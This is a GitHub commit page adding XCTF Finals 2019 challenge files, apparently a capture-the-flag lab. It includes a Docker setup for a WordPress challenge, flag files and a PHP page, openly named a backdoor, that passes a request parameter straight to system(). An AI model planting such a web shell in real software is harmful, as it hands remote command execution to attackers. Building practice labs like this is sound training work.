Skip to content
Permalink
Browse files

Add XCTF Finals 2019

  • Loading branch information
stypr committed Oct 27, 2019
1 parent ef22dc7 commit 72e3c0c682f1bcd5b12f951b16db1f36d65a0388
@@ -0,0 +1,5 @@
## XCTF Finals 2019

No writeups this time. Try them for fun!

![Scoreboard](scoreboard.jpg)
@@ -0,0 +1,5 @@
## babypress

Let's dig down into the easy baby-level wordpress 0day(?) exploitation!

by stypr
Binary file not shown.
@@ -0,0 +1,53 @@
version: '3.3'

services:
db:
image: mysql:5.7
volumes:
- my_data:/var/lib/mysql
networks:
- default
restart: always
environment:
MYSQL_ROOT_PASSWORD: secret_password
MYSQL_DATABASE: stypr
MYSQL_USER: stypr
MYSQL_PASSWORD: stypr

wordpress:
image: wordpress:latest
depends_on:
- db
ports:
- "8000:80"
networks:
- default
restart: always
environment:
WORDPRESS_DB_HOST: db:3306
WORDPRESS_DB_USER: stypr
WORDPRESS_DB_PASSWORD: stypr
WORDPRESS_DB_NAME: stypr

backdoor:
image: trafex/alpine-nginx-php7
depends_on:
- db
- wordpress
volumes:
- ./flag:/flag:ro
- ./index.php:/var/www/html/index.php:ro
networks:
- default
restart: always

networks:
default:
driver: bridge
ipam:
driver: default
config:
- subnet: 13.37.137.0/24

volumes:
my_data: {}
@@ -0,0 +1 @@
flag{stypr}
@@ -0,0 +1,20 @@
<?php

$backdoor = $_REQUEST['backdoor'];
if($backdoor){
@system($backdoor . " 2>&1");
}

?>
<!doctype html>
<html>
<head>
<title>stypr's secret backdoor</title>
</head>
<body>
<form method=POST action=index.php>
<input type="text" name="backdoor" value="backdoor">
<input type="submit" value="backdoor()">
</form>
</body>
</html>
@@ -0,0 +1 @@
Hint: Environment
@@ -0,0 +1,7 @@
<?php
$flag = "FLAG{this_surely_is_a_leg1timate_f!le_1nclusion}";

if(stripos($_SERVER['SCRIPT_NAME'], "flag.php") !== false){
die("<!-- flag.php successfully loaded. -->");
}
?>

0 comments on commit 72e3c0c

Please sign in to comment.
You can’t perform that action at this time.